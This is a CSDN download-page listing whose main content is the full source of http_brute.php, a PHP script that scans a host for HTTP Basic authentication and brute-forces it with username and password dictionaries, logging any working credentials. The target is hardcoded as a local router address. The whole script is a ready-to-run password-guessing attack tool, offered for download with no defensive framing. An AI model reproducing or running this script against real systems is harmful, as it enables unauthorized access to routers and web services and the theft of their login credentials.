http_brute.rar_ThisIsIt资源-CSDN文库

共1个文件

php：1个

版权申诉

37 浏览量 2022-09-24 17:21:30 上传评论收藏 1KB RAR 举报

资源推荐

资源详情

资源评论

收起资源包目录

http_brute.rar （1个子文件）

http_brute.php 3KB

<?php //Author:ClsHack.it //Site:www.clshack.it :D set_time_limit (0); define("DICTIONARY_PASSWORD","/home/clshack/pass.txt"); define("DICTIONARY_USERS","/home/clshack/users.txt"); define ("RESULT","result.log"); define ("PORT",80); define ("TIMEOUT",0.6); //output function write($string) { $fh = fopen(RESULT, 'a') or die("Can't open file:".RESULT."\n\nControl file permission."); fwrite($fh, $string."\n"); fclose($fh); } //port is open ? o.O function unreadable($ip) { $fp=@fsockopen($ip, PORT, $errno, $errstr, TIMEOUT); //response ? if($fp) return 1; //port close... return 0; } //is http basic authentication ? o.O function http_basic($ip) { $ip="http://".$ip; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$ip); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_NOBODY, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT); curl_exec($ch); $info = curl_getinfo($ch); curl_close ($ch); if($info["http_code"]=="401") return 1; else if($info["http_code"]=="200") { echo "$ip Return code 200\n"; write("$ip Return code 200\n"); return 0; } else return 0; } function authentication($ip,$user,$password) { $ip="http://".$ip; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$ip); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_NOBODY, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch,CURLOPT_USERPWD, "$user:$password"); curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT); curl_exec($ch); $info =curl_getinfo($ch); curl_close ($ch); if($info["http_code"]=="200") return 1; else return 0; } function crack($ip) { $esci=1; $users_file = @fopen(DICTIONARY_USERS, "r"); if ($users_file) { while (!feof($users_file) && $esci) { $user = fgets($users_file); $user=str_replace("\r","",$user); $user=str_replace("\n","",$user); $password_file = @fopen(DICTIONARY_PASSWORD, "r"); if ($password_file) { while (!feof($password_file)) { $password = fgets($password_file); $password=str_replace("\r","",$password); $password=str_replace("\n","",$password); //echo "->$user:$password, ip:$ip\n"; if(authentication($ip,$user,$password)) { echo "Password found ->$user:$password, ip:$ip\n"; write("Password found ->$user:$password, ip:$ip\n"); $esci=0; break; } } fclose($password_file); } else die("Can't open dictionary.\n"); } } else die("Can't open dictionary.\n"); fclose($users_file); } $ip="192.168.1.1"; if(unreadable($ip)) { if(http_basic($ip)) { echo "$ip\n"; crack($ip); } } ?>

评论收藏

内容反馈

版权申诉